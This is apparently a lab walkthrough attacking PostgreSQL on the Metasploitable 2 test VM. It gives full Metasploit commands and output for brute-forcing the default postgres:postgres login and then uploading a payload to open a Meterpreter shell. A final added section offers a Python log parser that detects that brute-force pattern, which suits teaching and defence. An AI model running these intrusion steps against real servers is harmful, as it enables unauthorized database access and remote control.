The Nmap scan of Metasploitable 2 revealed:
PORT     STATE SERVICE    VERSION
5432/tcp open  postgresql PostgreSQL DB 8.3.0 – 8.3.7
This exploit is a straightforward brute force using Metasploit's postgres_login scanner:
msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf auxiliary(postgres_login) > run
[*] 192.168.1.103:5432 Postgres - [01/21] - Trying username:'postgres' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'postgres':''
[-] 192.168.1.103:5432 Postgres - [01/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [02/21] - Trying username:'' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: '':''
[-] 192.168.1.103:5432 Postgres - [02/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [03/21] - Trying username:'scott' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'scott':''
[-] 192.168.1.103:5432 Postgres - [03/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [04/21] - Trying username:'admin' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'admin':''
[-] 192.168.1.103:5432 Postgres - [04/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [05/21] - Trying username:'postgres' with password:'postgres' on database 'template1'
[+] 192.168.1.103:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.1.103:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
And there we have it; username and password are both postgres.
So let's connect with the psql client from the terminal:
# psql -h 192.168.1.103 -U postgres -W
Password for user postgres:
psql (9.1.9, server 8.3.1)
WARNING: psql version 9.1, server version 8.3.
         Some psql features might not work.
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type "help" for help.

postgres=# \l
                            List of databases
   Name    |  Owner   | Encoding |   Access privileges
-----------+----------+----------+-----------------------
 postgres  | postgres | UTF8     |
 template0 | postgres | UTF8     | =c/postgres          +
           |          |          | postgres=CTc/postgres
 template1 | postgres | UTF8     | =c/postgres          +
           |          |          | postgres=CTc/postgres
(3 rows)

postgres=#
Below is a video demonstrating the above with additional post exploitation maneuvers:
Now that we have the password, we can also use Metasploit's postgres_payload module to obtain a Meterpreter shell:
msf > use exploit/linux/postgres/postgres_payload
msf exploit(postgres_payload) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD                   no        The password for the specified username. Leave blank for a random password.
   RHOST     192.168.1.103    yes       The target address
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

msf exploit(postgres_payload) > set PASSWORD postgres
PASSWORD => postgres
msf exploit(postgres_payload) > set PAYLOAD linux/x86/meterpreter/bind_tcp
PAYLOAD => linux/x86/meterpreter/bind_tcp
msf exploit(postgres_payload) > exploit

[*] Started bind handler
[*] 192.168.1.103:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/fTDEMbhY.so, should be cleaned up automatically
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.78:49575 -> 192.168.1.103:4444) at 2013-11-20 08:04:41 +0000

meterpreter >
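As an added, defender-side example that is not part of the original post: the scanner run above leaves a distinctive trail in the PostgreSQL server log, a burst of failed authentications from one client address followed by a successful one. The Python routine below flags that pattern. The log lines, the `log_line_prefix` format (`%t [%p] %h`), and the window and threshold values are constructed assumptions, not taken from the post.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not from the original post). They assume
# log_line_prefix = '%t [%p] %h ' and log_connections = on, so the client
# address precedes each message and successful logins are recorded.
SAMPLE_LOG = """\
2013-11-20 08:01:10 UTC [4101] 192.168.1.78 FATAL:  password authentication failed for user "postgres"
2013-11-20 08:01:11 UTC [4102] 192.168.1.78 FATAL:  password authentication failed for user ""
2013-11-20 08:01:11 UTC [4103] 192.168.1.78 FATAL:  password authentication failed for user "scott"
2013-11-20 08:01:12 UTC [4104] 192.168.1.78 FATAL:  password authentication failed for user "admin"
2013-11-20 08:01:12 UTC [4105] 192.168.1.78 LOG:  connection authorized: user=postgres database=template1
2013-11-20 08:30:00 UTC [4200] 192.168.1.50 FATAL:  password authentication failed for user "postgres"
2013-11-20 08:40:00 UTC [4201] 192.168.1.50 LOG:  connection authorized: user=postgres database=app
"""

LINE_RE = re.compile(r'^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \S+ \[\d+\] '
                     r'(?P<host>\S+) (?P<level>FATAL|LOG):\s+(?P<msg>.*)$')
FAIL_RE = re.compile(r'authentication failed for user "(?P<user>[^"]*)"')
OK_RE = re.compile(r'connection authorized: user=(?P<user>\S+)')

def find_bruteforce_logins(log_text, window=timedelta(minutes=5), threshold=3):
    """Return (host, user, failure_count) for every successful login that was
    preceded, within `window`, by at least `threshold` failures from that host."""
    failures = defaultdict(list)  # client host -> timestamps of failed logins
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not use the assumed prefix
        ts = datetime.strptime(m['ts'], '%Y-%m-%d %H:%M:%S')
        host, msg = m['host'], m['msg']
        if m['level'] == 'FATAL' and FAIL_RE.search(msg):
            failures[host].append(ts)
            continue
        ok = OK_RE.search(msg)
        if ok:
            recent = [t for t in failures[host] if timedelta(0) <= ts - t <= window]
            if len(recent) >= threshold:
                hits.append((host, ok['user'], len(recent)))
    return hits

if __name__ == '__main__':
    for host, user, n in find_bruteforce_logins(SAMPLE_LOG):
        print(f'{host}: {n} failed logins then success as {user}')
```

On the sample above only 192.168.1.78 is reported; the single failure from 192.168.1.50 is both below the threshold and outside the window. The same approach ports to whatever `log_line_prefix` a site actually uses by adjusting `LINE_RE`.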